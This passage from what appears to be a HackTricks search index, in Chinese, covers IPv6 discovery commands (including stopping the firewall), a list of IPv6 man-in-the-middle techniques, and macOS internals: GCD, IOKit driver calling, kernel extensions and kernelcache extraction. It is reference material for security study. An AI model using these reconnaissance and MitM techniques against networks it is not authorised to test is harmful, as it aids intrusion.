向组播地址 ff02::1 发送 ping,以发现本地网络上的 IPv6 地址。 bash service ufw stop # Stop the firewall\\nping6 -I ff02::1 # Send a ping to multicast address\\nip -6 neigh # Display the neighbor table","breadcrumbs":"Pentesting Network » Pentesting IPv6 » 在网络中发现 IPv6 地址","id":"215","title":"在网络中发现 IPv6 地址"},"2150":{"body":"调度队列是一个命名对象,提供块的 FIFO 执行顺序。 块被设置在队列中以供执行,这些队列支持 2 种模式:DISPATCH_QUEUE_SERIAL 和 DISPATCH_QUEUE_CONCURRENT。当然, 串行 队列 不会有竞争条件 问题,因为块不会在前一个块完成之前执行。但 另一种类型的队列可能会有 。 默认队列: .main-thread: 来自 dispatch_get_main_queue() .libdispatch-manager: GCD 的队列管理器 .root.libdispatch-manager: GCD 的队列管理器 .root.maintenance-qos: 最低优先级任务 .root.maintenance-qos.overcommit .root.background-qos: 可用作 DISPATCH_QUEUE_PRIORITY_BACKGROUND .root.background-qos.overcommit .root.utility-qos: 可用作 DISPATCH_QUEUE_PRIORITY_NON_INTERACTIVE .root.utility-qos.overcommit .root.default-qos: 可用作 DISPATCH_QUEUE_PRIORITY_DEFAULT .root.background-qos.overcommit .root.user-initiated-qos: 可用作 DISPATCH_QUEUE_PRIORITY_HIGH .root.background-qos.overcommit .root.user-interactive-qos: 最高优先级 .root.background-qos.overcommit 请注意,系统将决定 每个时刻哪个线程处理哪个队列 (多个线程可能在同一队列中工作,或者同一线程可能在某些时刻在不同队列中工作) 属性 使用 dispatch_queue_create 创建队列时,第三个参数是 dispatch_queue_attr_t,通常是 DISPATCH_QUEUE_SERIAL(实际上是 NULL)或 DISPATCH_QUEUE_CONCURRENT,这是指向 dispatch_queue_attr_t 结构的指针,允许控制队列的一些参数。","breadcrumbs":"macOS Security & Privilege Escalation » macOS GCD - Grand Central Dispatch » 队列","id":"2150","title":"队列"},"2151":{"body":"libdispatch 使用多个对象,队列和块只是其中的 2 个。可以使用 dispatch_object_create 创建这些对象: block data: 数据块 group: 块组 io: 异步 I/O 请求 mach: Mach 端口 mach_msg: Mach 消息 pthread_root_queue: 带有 pthread 线程池的队列,而不是工作队列 queue semaphore source: 事件源","breadcrumbs":"macOS Security & Privilege Escalation » macOS GCD - Grand Central Dispatch » 调度对象","id":"2151","title":"调度对象"},"2152":{"body":"在 Objective-C 中,有不同的函数可以将块发送以并行执行: dispatch_async : 提交一个块以在调度队列上异步执行,并立即返回。 dispatch_sync : 提交一个块对象以执行,并在该块执行完成后返回。 dispatch_once : 在应用程序的生命周期内仅执行一次块对象。 dispatch_async_and_wait : 提交一个工作项以执行,并仅在其完成执行后返回。与 dispatch_sync 不同,此函数在执行块时尊重队列的所有属性。 这些函数期望这些参数: dispatch_queue_t queue, dispatch_block_t block 这是 块的结构 : c struct Block {\\nvoid *isa; // NSConcreteStackBlock,...\\nint flags;\\nint reserved;\\nvoid *invoke;\\nstruct BlockDescriptor *descriptor;\\n// captured variables go here\\n}; 这是一个使用 parallelism 和 dispatch_async 的示例: objectivec #import // Define a block\\nvoid (^backgroundTask)(void) = ^{\\n// Code to be executed in the background\\nfor (int i = 0; i < 10; i++) {\\nNSLog(@\\"Background task %d\\", i);\\nsleep(1); // Simulate a long-running task\\n}\\n}; int main(int argc, const char * argv[]) {\\n@autoreleasepool {\\n// Create a dispatch queue\\ndispatch_queue_t backgroundQueue = dispatch_queue_create(\\"com.example.backgroundQueue\\", NULL); // Submit the block to the queue for asynchronous execution\\ndispatch_async(backgroundQueue, backgroundTask); // Continue with other work on the main queue or thread\\nfor (int i = 0; i < 10; i++) {\\nNSLog(@\\"Main task %d\\", i);\\nsleep(1); // Simulate a long-running task\\n}\\n}\\nreturn 0;\\n}","breadcrumbs":"macOS Security & Privilege Escalation » macOS GCD - Grand Central Dispatch » Objective-C","id":"2152","title":"Objective-C"},"2153":{"body":"libswiftDispatch 是一个库,提供 Swift 绑定 到 Grand Central Dispatch (GCD) 框架,该框架最初是用 C 编写的。 libswiftDispatch 库将 C GCD API 封装在一个更适合 Swift 的接口中,使 Swift 开发者更容易和直观地使用 GCD。 DispatchQueue.global().sync{ ... } DispatchQueue.global().async{ ... } let onceToken = DispatchOnce(); onceToken.perform { ... } async await var (data, response) = await URLSession.shared.data(from: URL(string: \\"https://api.example.com/getData\\")) 代码示例 : swift import Foundation // Define a closure (the Swift equivalent of a block)\\nlet backgroundTask: () -> Void = {\\nfor i in 0..<10 {\\nprint(\\"Background task \\\\(i)\\")\\nsleep(1) // Simulate a long-running task\\n}\\n} // Entry point\\nautoreleasepool {\\n// Create a dispatch queue\\nlet backgroundQueue = DispatchQueue(label: \\"com.example.backgroundQueue\\") // Submit the closure to the queue for asynchronous execution\\nbackgroundQueue.async(execute: backgroundTask) // Continue with other work on the main queue\\nfor i in 0..<10 {\\nprint(\\"Main task \\\\(i)\\")\\nsleep(1) // Simulate a long-running task\\n}\\n}","breadcrumbs":"macOS Security & Privilege Escalation » macOS GCD - Grand Central Dispatch » Swift","id":"2153","title":"Swift"},"2154":{"body":"以下 Frida 脚本可用于 hook 进入多个 dispatch 函数并提取队列名称、回溯和块: https://github.com/seemoo-lab/frida-scripts/blob/main/scripts/libdispatch.js bash frida -U -l libdispatch.js dispatch_sync\\nCalling queue: com.apple.UIKit._UIReusePool.reuseSetAccess\\nCallback function: 0x19e3a6488 UIKitCore!__26-[_UIReusePool addObject:]_block_invoke\\nBacktrace:\\n0x19e3a6460 UIKitCore!-[_UIReusePool addObject:]\\n0x19e3a5db8 UIKitCore!-[UIGraphicsRenderer _enqueueContextForReuse:]\\n0x19e3a57fc UIKitCore!+[UIGraphicsRenderer _destroyCGContext:withRenderer:]\\n[...]","breadcrumbs":"macOS Security & Privilege Escalation » macOS GCD - Grand Central Dispatch » Frida","id":"2154","title":"Frida"},"2155":{"body":"目前 Ghidra 既不理解 ObjectiveC dispatch_block_t 结构,也不理解 swift_dispatch_block 结构。 所以如果你想让它理解这些结构,你可以 声明它们 : 然后,在代码中找到它们 被使用 的地方: tip 注意所有提到“block”的引用,以了解你如何能够判断该结构正在被使用。 右键单击变量 -> 重新定义变量,并在这种情况下选择 swift_dispatch_block : Ghidra 将自动重写所有内容:","breadcrumbs":"macOS Security & Privilege Escalation » macOS GCD - Grand Central Dispatch » Ghidra","id":"2155","title":"Ghidra"},"2156":{"body":"*OS Internals, Volume I: User Mode. By Jonathan Levin tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS GCD - Grand Central Dispatch » References","id":"2156","title":"References"},"2157":{"body":"Reading time: 7 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Kernel & System Extensions » macOS 内核与系统扩展","id":"2157","title":"macOS 内核与系统扩展"},"2158":{"body":"macOS 的 核心是 XNU ,代表“X is Not Unix”。这个内核基本上由 Mach 微内核 (稍后讨论)和来自伯克利软件分发( BSD )的元素组成。XNU 还通过一个名为 I/O Kit 的系统提供 内核驱动程序的平台 。XNU 内核是 Darwin 开源项目的一部分,这意味着 其源代码是公开可获取的 。 从安全研究人员或 Unix 开发者的角度来看, macOS 感觉与 FreeBSD 系统非常 相似 ,具有优雅的 GUI 和一系列自定义应用程序。大多数为 BSD 开发的应用程序可以在 macOS 上编译和运行,而无需修改,因为熟悉 Unix 用户的命令行工具在 macOS 中都存在。然而,由于 XNU 内核结合了 Mach,传统 Unix 类系统与 macOS 之间存在一些显著差异,这些差异可能导致潜在问题或提供独特优势。 XNU 的开源版本: https://opensource.apple.com/source/xnu/","breadcrumbs":"macOS Security & Privilege Escalation » macOS Kernel & System Extensions » XNU 内核","id":"2158","title":"XNU 内核"},"2159":{"body":"Mach 是一个 微内核 ,旨在 与 UNIX 兼容 。其一个关键设计原则是 最小化 在 内核 空间中运行的 代码 ,而允许许多典型的内核功能,如文件系统、网络和 I/O,作为 用户级任务 运行。 在 XNU 中,Mach 负责内核通常处理的许多关键低级操作,如处理器调度、多任务处理和虚拟内存管理。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Kernel & System Extensions » Mach","id":"2159","title":"Mach"},"216":{"body":"在IPv6网络中执行MitM攻击的几种技术包括: 冒充ICMPv6邻居或路由器广告。 使用ICMPv6重定向或“数据包过大”消息来操纵路由。 攻击移动IPv6(通常需要禁用IPSec)。 设置恶意DHCPv6服务器。","breadcrumbs":"Pentesting Network » Pentesting IPv6 » IPv6 Man-in-the-Middle (MitM) Attacks","id":"216","title":"IPv6 Man-in-the-Middle (MitM) Attacks"},"2160":{"body":"XNU 内核 还 包含 大量来自 FreeBSD 项目的代码。这些代码 与 Mach 一起在内核中运行 ,在同一地址空间中。然而,XNU 中的 FreeBSD 代码可能与原始 FreeBSD 代码有显著不同,因为需要进行修改以确保其与 Mach 的兼容性。FreeBSD 贡献了许多内核操作,包括: 进程管理 信号处理 基本安全机制,包括用户和组管理 系统调用基础设施 TCP/IP 堆栈和套接字 防火墙和数据包过滤 由于 BSD 和 Mach 之间的不同概念框架,理解它们之间的交互可能很复杂。例如,BSD 使用进程作为其基本执行单元,而 Mach 基于线程操作。这种差异在 XNU 中通过 将每个 BSD 进程与一个包含恰好一个 Mach 线程的 Mach 任务关联 来调和。当使用 BSD 的 fork() 系统调用时,内核中的 BSD 代码使用 Mach 函数来创建任务和线程结构。 此外, Mach 和 BSD 各自维护不同的安全模型 : Mach 的 安全模型基于 端口权限 ,而 BSD 的安全模型基于 进程所有权 。这两种模型之间的差异偶尔会导致本地特权提升漏洞。除了典型的系统调用外,还有 Mach 陷阱,允许用户空间程序与内核交互 。这些不同的元素共同构成了 macOS 内核的多面性混合架构。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Kernel & System Extensions » BSD","id":"2160","title":"BSD"},"2161":{"body":"I/O Kit 是 XNU 内核中的一个开源、面向对象的 设备驱动程序框架 ,处理 动态加载的设备驱动程序 。它允许在内核中动态添加模块化代码,支持多种硬件。 macOS IOKit","breadcrumbs":"macOS Security & Privilege Escalation » macOS Kernel & System Extensions » I/O Kit - 驱动程序","id":"2161","title":"I/O Kit - 驱动程序"},"2162":{"body":"macOS IPC - Inter Process Communication","breadcrumbs":"macOS Security & Privilege Escalation » macOS Kernel & System Extensions » IPC - 进程间通信","id":"2162","title":"IPC - 进程间通信"},"2163":{"body":"macOS 对加载内核扩展(.kext) 非常严格 ,因为代码将以高权限运行。实际上,默认情况下几乎不可能(除非找到绕过方法)。 在以下页面中,您还可以看到如何恢复 macOS 在其 kernelcache 中加载的 .kext: macOS Kernel Extensions & Debugging","breadcrumbs":"macOS Security & Privilege Escalation » macOS Kernel & System Extensions » macOS 内核扩展","id":"2163","title":"macOS 内核扩展"},"2164":{"body":"macOS 创建了系统扩展,而不是使用内核扩展,提供用户级 API 与内核交互。这样,开发人员可以避免使用内核扩展。 macOS System Extensions","breadcrumbs":"macOS Security & Privilege Escalation » macOS Kernel & System Extensions » macOS 系统扩展","id":"2164","title":"macOS 系统扩展"},"2165":{"body":"The Mac Hacker\'s Handbook https://taomm.org/vol1/analysis.html tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Kernel & System Extensions » 参考文献","id":"2165","title":"参考文献"},"2166":{"body":"Reading time: 12 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Kernel & System Extensions » macOS IOKit » macOS IOKit","id":"2166","title":"macOS IOKit"},"2167":{"body":"I/O Kit 是一个开源的面向对象的 设备驱动框架 ,位于 XNU 内核中,处理 动态加载的设备驱动程序 。它允许在运行时将模块化代码添加到内核中,支持多种硬件。 IOKit 驱动程序基本上会 从内核导出函数 。这些函数参数 类型 是 预定义 的并经过验证。此外,类似于 XPC,IOKit 只是 Mach 消息 之上的另一层。 IOKit XNU 内核代码 由 Apple 在 https://github.com/apple-oss-distributions/xnu/tree/main/iokit 开源。此外,用户空间的 IOKit 组件也开源 https://github.com/opensource-apple/IOKitUser 。 然而, 没有 IOKit 驱动程序 是开源的。无论如何,驱动程序的发布有时可能会附带符号,使其更易于调试。查看如何 从固件获取驱动程序扩展这里 。 它是用 C++ 编写的。您可以使用以下命令获取去除修饰的 C++ 符号: bash # Get demangled symbols\\nnm -C com.apple.driver.AppleJPEGDriver # Demangled symbols from stdin\\nc++filt\\n__ZN16IOUserClient202222dispatchExternalMethodEjP31IOExternalMethodArgumentsOpaquePK28IOExternalMethodDispatch2022mP8OSObjectPv\\nIOUserClient2022::dispatchExternalMethod(unsigned int, IOExternalMethodArgumentsOpaque*, IOExternalMethodDispatch2022 const*, unsigned long, OSObject*, void*) caution IOKit 暴露的函数 可能在客户端尝试调用函数时执行 额外的安全检查 ,但请注意,应用程序通常受到 沙箱 的 限制 ,只能与特定的 IOKit 函数进行交互。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Kernel & System Extensions » macOS IOKit » 基本信息","id":"2167","title":"基本信息"},"2168":{"body":"在 macOS 中,它们位于: /System/Library/Extensions 内置于 OS X 操作系统的 KEXT 文件。 /Library/Extensions 由第三方软件安装的 KEXT 文件 在 iOS 中,它们位于: /System/Library/Extensions bash #Use kextstat to print the loaded drivers\\nkextstat\\nExecuting: /usr/bin/kmutil showloaded\\nNo variant specified, falling back to release\\nIndex Refs Address Size Wired Name (Version) UUID \\n1 142 0 0 0 com.apple.kpi.bsd (20.5.0) 52A1E876-863E-38E3-AC80-09BBAB13B752 <>\\n2 11 0 0 0 com.apple.kpi.dsep (20.5.0) 52A1E876-863E-38E3-AC80-09BBAB13B752 <>\\n3 170 0 0 0 com.apple.kpi.iokit (20.5.0) 52A1E876-863E-38E3-AC80-09BBAB13B752 <>\\n4 0 0 0 0 com.apple.kpi.kasan (20.5.0) 52A1E876-863E-38E3-AC80-09BBAB13B752 <>\\n5 175 0 0 0 com.apple.kpi.libkern (20.5.0) 52A1E876-863E-38E3-AC80-09BBAB13B752 <>\\n6 154 0 0 0 com.apple.kpi.mach (20.5.0) 52A1E876-863E-38E3-AC80-09BBAB13B752 <>\\n7 88 0 0 0 com.apple.kpi.private (20.5.0) 52A1E876-863E-38E3-AC80-09BBAB13B752 <>\\n8 106 0 0 0 com.apple.kpi.unsupported (20.5.0) 52A1E876-863E-38E3-AC80-09BBAB13B752 <>\\n9 2 0xffffff8003317000 0xe000 0xe000 com.apple.kec.Libm (1) 6C1342CC-1D74-3D0F-BC43-97D5AD38200A <5>\\n10 12 0xffffff8003544000 0x92000 0x92000 com.apple.kec.corecrypto (11.1) F5F1255F-6552-3CF4-A9DB-D60EFDEB4A9A <8 7 6 5 3 1> 直到第9个,列出的驱动程序是 加载在地址0 。这意味着这些不是实际的驱动程序,而是 内核的一部分,无法卸载 。 为了找到特定的扩展,您可以使用: bash kextfind -bundle-id com.apple.iokit.IOReportFamily #Search by full bundle-id\\nkextfind -bundle-id -substring IOR #Search by substring in bundle-id 要加载和卸载内核扩展,请执行: bash kextload com.apple.iokit.IOReportFamily\\nkextunload com.apple.iokit.IOReportFamily","breadcrumbs":"macOS Security & Privilege Escalation » macOS Kernel & System Extensions » macOS IOKit » 驱动程序","id":"2168","title":"驱动程序"},"2169":{"body":"IORegistry 是 macOS 和 iOS 中 IOKit 框架的一个关键部分,作为表示系统硬件配置和状态的数据库。它是一个 层次化的对象集合,表示系统上加载的所有硬件和驱动程序 及其相互关系。 您可以使用 cli ioreg 从控制台检查 IORegistry(对 iOS 特别有用)。 bash ioreg -l #List all\\nioreg -w 0 #Not cut lines\\nioreg -p #Check other plane 您可以从 Xcode 附加工具 下载 IORegistryExplorer ,并通过 图形 界面检查 macOS IORegistry 。 在 IORegistryExplorer 中,“平面”用于组织和显示 IORegistry 中不同对象之间的关系。每个平面代表特定类型的关系或系统硬件和驱动程序配置的特定视图。以下是您可能在 IORegistryExplorer 中遇到的一些常见平面: IOService 平面 :这是最一般的平面,显示代表驱动程序和 nubs(驱动程序之间的通信通道)的服务对象。它显示这些对象之间的提供者-客户端关系。 IODeviceTree 平面 :该平面表示设备与系统之间的物理连接。它通常用于可视化通过 USB 或 PCI 等总线连接的设备层次结构。 IOPower 平面 :以电源管理的方式显示对象及其关系。它可以显示哪些对象影响其他对象的电源状态,对于调试与电源相关的问题非常有用。 IOUSB 平面 :专注于 USB 设备及其关系,显示 USB 集线器和连接设备的层次结构。 IOAudio 平面 :该平面用于表示音频设备及其在系统中的关系。 ...","breadcrumbs":"macOS Security & Privilege Escalation » macOS Kernel & System Extensions » macOS IOKit » IORegistry","id":"2169","title":"IORegistry"},"217":{"body":"","breadcrumbs":"Pentesting Network » Pentesting IPv6 » Identifying IPv6 Addresses in the eild","id":"217","title":"Identifying IPv6 Addresses in the eild"},"2170":{"body":"以下代码连接到 IOKit 服务 \\"YourServiceNameHere\\" 并调用选择器 0 内的函数。为此: 首先调用 IOServiceMatching 和 IOServiceGetMatchingServices 来获取服务。 然后通过调用 IOServiceOpen 建立连接。 最后调用一个函数,使用 IOConnectCallScalarMethod 指定选择器 0(选择器是您要调用的函数分配的数字)。 objectivec #import \\n#import int main(int argc, const char * argv[]) {\\n@autoreleasepool {\\n// Get a reference to the service using its name\\nCFMutableDictionaryRef matchingDict = IOServiceMatching(\\"YourServiceNameHere\\");\\nif (matchingDict == NULL) {\\nNSLog(@\\"Failed to create matching dictionary\\");\\nreturn -1;\\n} // Obtain an iterator over all matching services\\nio_iterator_t iter;\\nkern_return_t kr = IOServiceGetMatchingServices(kIOMasterPortDefault, matchingDict, &iter);\\nif (kr != KERN_SUCCESS) {\\nNSLog(@\\"Failed to get matching services\\");\\nreturn -1;\\n} // Get a reference to the first service (assuming it exists)\\nio_service_t service = IOIteratorNext(iter);\\nif (!service) {\\nNSLog(@\\"No matching service found\\");\\nIOObjectRelease(iter);\\nreturn -1;\\n} // Open a connection to the service\\nio_connect_t connect;\\nkr = IOServiceOpen(service, mach_task_self(), 0, &connect);\\nif (kr != KERN_SUCCESS) {\\nNSLog(@\\"Failed to open service\\");\\nIOObjectRelease(service);\\nIOObjectRelease(iter);\\nreturn -1;\\n} // Call a method on the service\\n// Assume the method has a selector of 0, and takes no arguments\\nkr = IOConnectCallScalarMethod(connect, 0, NULL, 0, NULL, NULL);\\nif (kr != KERN_SUCCESS) {\\nNSLog(@\\"Failed to call method\\");\\n} // Cleanup\\nIOServiceClose(connect);\\nIOObjectRelease(service);\\nIOObjectRelease(iter);\\n}\\nreturn 0;\\n} 有 其他 函数可以用来调用 IOKit 函数,除了 IOConnectCallScalarMethod ,还有 IOConnectCallMethod 、 IOConnectCallStructMethod ...","breadcrumbs":"macOS Security & Privilege Escalation » macOS Kernel & System Extensions » macOS IOKit » 驱动程序通信代码示例","id":"2170","title":"驱动程序通信代码示例"},"2171":{"body":"您可以从 固件映像 (ipsw) 中获取这些。例如,将其加载到您喜欢的反编译器中。 您可以开始反编译 externalMethod 函数,因为这是接收调用并调用正确函数的驱动函数: 那个可怕的调用去掉混淆后的意思是: cpp IOUserClient2022::dispatchExternalMethod(unsigned int, IOExternalMethodArgumentsOpaque*, IOExternalMethodDispatch2022 const*, unsigned long, OSObject*, void*) 注意在之前的定义中缺少了 self 参数,好的定义应该是: cpp IOUserClient2022::dispatchExternalMethod(self, unsigned int, IOExternalMethodArgumentsOpaque*, IOExternalMethodDispatch2022 const*, unsigned long, OSObject*, void*) 实际上,您可以在 https://github.com/apple-oss-distributions/xnu/blob/1031c584a5e37aff177559b9f69dbd3c8c3fd30a/iokit/Kernel/IOUserClient.cpp#L6388 找到真实的定义: cpp IOUserClient2022::dispatchExternalMethod(uint32_t selector, IOExternalMethodArgumentsOpaque *arguments,\\nconst IOExternalMethodDispatch2022 dispatchArray[], size_t dispatchArrayCount,\\nOSObject * target, void * reference) 使用此信息,您可以重写 Ctrl+Right -> Edit function signature 并设置已知类型: 新的反编译代码将如下所示: 在下一步中,我们需要定义 IOExternalMethodDispatch2022 结构体。它是开源的,您可以在 https://github.com/apple-oss-distributions/xnu/blob/1031c584a5e37aff177559b9f69dbd3c8c3fd30a/iokit/IOKit/IOUserClient.h#L168-L176 中找到,您可以定义它: 现在,跟随 (IOExternalMethodDispatch2022 *)&sIOExternalMethodArray,您可以看到很多数据: 将数据类型更改为 IOExternalMethodDispatch2022: 更改后: 现在我们知道这里有一个 7 个元素的数组 (检查最终的反编译代码),点击创建一个 7 个元素的数组: 数组创建后,您可以看到所有导出的函数: tip 如果您记得,从用户空间 调用 一个 导出 函数时,我们不需要调用函数的名称,而是 选择器编号 。在这里,您可以看到选择器 0 是函数 initializeDecoder ,选择器 1 是 startDecoder ,选择器 2 是 initializeEncoder ... tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Kernel & System Extensions » macOS IOKit » 反向工程驱动入口点","id":"2171","title":"反向工程驱动入口点"},"2172":{"body":"Reading time: 13 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Kernel & System Extensions » macOS Kernel Extensions & Debugging » macOS 内核扩展与调试","id":"2172","title":"macOS 内核扩展与调试"},"2173":{"body":"内核扩展(Kexts)是 以 .kext 为扩展名的包 ,直接 加载到 macOS 内核空间 ,为主操作系统提供额外功能。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Kernel & System Extensions » macOS Kernel Extensions & Debugging » 基本信息","id":"2173","title":"基本信息"},"2174":{"body":"从 macOS Catalina (10.15) 开始,Apple 将大多数遗留 KPI 标记为 废弃 ,并引入了 系统扩展和 DriverKit 框架,这些框架在 用户空间 中运行。从 macOS Big Sur (11) 开始,操作系统将 拒绝加载 依赖于废弃 KPI 的第三方 kext,除非机器以 降低安全性 模式启动。在 Apple Silicon 上,启用 kext 还要求用户: 重启进入 恢复 → 启动安全实用工具 。 选择 降低安全性 并勾选 “允许用户管理来自已识别开发者的内核扩展” 。 重启并在 系统设置 → 隐私与安全 中批准 kext。 使用 DriverKit/系统扩展编写的用户空间驱动程序显著 减少攻击面 ,因为崩溃或内存损坏被限制在沙盒进程中,而不是内核空间。 📝 从 macOS Sequoia (15) 开始,Apple 完全移除了几个遗留的网络和 USB KPI – 唯一向前兼容的解决方案是迁移到系统扩展。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Kernel & System Extensions » macOS Kernel Extensions & Debugging » 废弃状态与 DriverKit / 系统扩展","id":"2174","title":"废弃状态与 DriverKit / 系统扩展"},"2175":{"body":"显然,这么强大以至于 加载内核扩展 是 复杂的 。内核扩展必须满足以下 要求 才能被加载: 当 进入恢复模式 时,必须 允许加载内核扩展 : 内核扩展必须 使用内核代码签名证书签名 ,该证书只能由 Apple 授予 。Apple 将详细审核公司及其所需原因。 内核扩展还必须 经过公证 ,Apple 将能够检查其是否含有恶意软件。 然后, root 用户是唯一可以 加载内核扩展 的人,包内的文件必须 属于 root 。 在上传过程中,包必须准备在 受保护的非 root 位置 :/Library/StagedExtensions(需要 com.apple.rootless.storage.KernelExtensionManagement 授权)。 最后,在尝试加载时,用户将 收到确认请求 ,如果接受,计算机必须 重启 以加载它。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Kernel & System Extensions » macOS Kernel Extensions & Debugging » 要求","id":"2175","title":"要求"},"2176":{"body":"在 Catalina 中是这样的:有趣的是, 验证 过程发生在 用户空间 。然而,只有具有 com.apple.private.security.kext-management 授权的应用程序可以 请求内核加载扩展 :kextcache、kextload、kextutil、kextd、syspolicyd kextutil cli 启动 加载扩展的 验证 过程 它将通过使用 Mach 服务 与 kextd 进行通信。 kextd 将检查多个事项,例如 签名 它将与 syspolicyd 进行通信以 检查 扩展是否可以 加载 。 syspolicyd 将 提示 用户 如果扩展尚未被加载。 syspolicyd 将结果报告给 kextd kextd 最终将能够 告诉内核加载 扩展 如果 kextd 不可用, kextutil 可以执行相同的检查。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Kernel & System Extensions » macOS Kernel Extensions & Debugging » 加载过程","id":"2176","title":"加载过程"},"2177":{"body":"kextstat 是历史工具,但在最近的 macOS 版本中已 废弃 。现代接口是 kmutil : bash # List every extension currently linked in the kernel, sorted by load address\\nsudo kmutil showloaded --sort # Show only third-party / auxiliary collections\\nsudo kmutil showloaded --collection aux # Unload a specific bundle\\nsudo kmutil unload -b com.example.mykext 旧语法仍可供参考: bash # (Deprecated) Get loaded kernel extensions\\nkextstat # (Deprecated) Get dependencies of the kext number 22\\nkextstat | grep \\" 22 \\" | cut -c2-5,50- | cut -d \'(\' -f1 kmutil inspect 还可以用于 转储内核集合 (KC) 的内容或验证 kext 是否解析所有符号依赖: bash # List fileset entries contained in the boot KC\\nkmutil inspect -B /System/Library/KernelCollections/BootKernelExtensions.kc --show-fileset-entries # Check undefined symbols of a 3rd party kext before loading\\nkmutil libraries -p /Library/Extensions/FancyUSB.kext --undef-symbols","breadcrumbs":"macOS Security & Privilege Escalation » macOS Kernel & System Extensions » macOS Kernel Extensions & Debugging » 枚举与管理(已加载的 kexts)","id":"2177","title":"枚举与管理(已加载的 kexts)"},"2178":{"body":"caution 尽管内核扩展预计位于 /System/Library/Extensions/ 中,但如果你去这个文件夹,你 不会找到任何二进制文件 。这是因为 kernelcache ,为了反向工程一个 .kext,你需要找到获取它的方法。 kernelcache 是 XNU 内核的预编译和预链接版本 ,以及必要的设备 驱动程序 和 内核扩展 。它以 压缩 格式存储,并在启动过程中解压到内存中。kernelcache 通过提供一个准备就绪的内核和关键驱动程序的版本,促进了 更快的启动时间 ,减少了在启动时动态加载和链接这些组件所需的时间和资源。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Kernel & System Extensions » macOS Kernel Extensions & Debugging » Kernelcache","id":"2178","title":"Kernelcache"},"2179":{"body":"在 iOS 中,它位于 /System/Library/Caches/com.apple.kernelcaches/kernelcache ,在 macOS 中你可以通过以下命令找到它: find / -name \\"kernelcache\\" 2>/dev/null 在我的 macOS 中,我找到了它在: /System/Volumes/Preboot/1BAEB4B5-180B-4C46-BD53-51152B7D92DA/boot/DAD35E7BC0CDA79634C20BD1BD80678DFB510B2AAD3D25C1228BB34BCD0A711529D3D571C93E29E1D0C1264750FA043F/System/Library/Caches/com.apple.kernelcaches/kernelcache IMG4 IMG4 文件格式是苹果在其 iOS 和 macOS 设备中用于安全 存储和验证固件 组件(如 kernelcache )的容器格式。IMG4 格式包括一个头部和几个标签,这些标签封装了不同的数据片段,包括实际的有效载荷(如内核或引导加载程序)、签名和一组清单属性。该格式支持加密验证,允许设备在执行固件组件之前确认其真实性和完整性。 它通常由以下组件组成: 有效载荷 (IM4P) : 通常被压缩(LZFSE4, LZSS, …) 可选加密 清单 (IM4M) : 包含签名 额外的键/值字典 恢复信息 (IM4R) : 也称为 APNonce 防止某些更新的重放 可选:通常不会找到 解压 Kernelcache: bash # img4tool (https://github.com/tihmstar/img4tool)\\nimg4tool -e kernelcache.release.iphone14 -o kernelcache.release.iphone14.e # pyimg4 (https://github.com/m1stadev/PyIMG4)\\npyimg4 im4p extract -i kernelcache.release.iphone14 -o kernelcache.release.iphone14.e","breadcrumbs":"macOS Security & Privilege Escalation » macOS Kernel & System Extensions » macOS Kernel 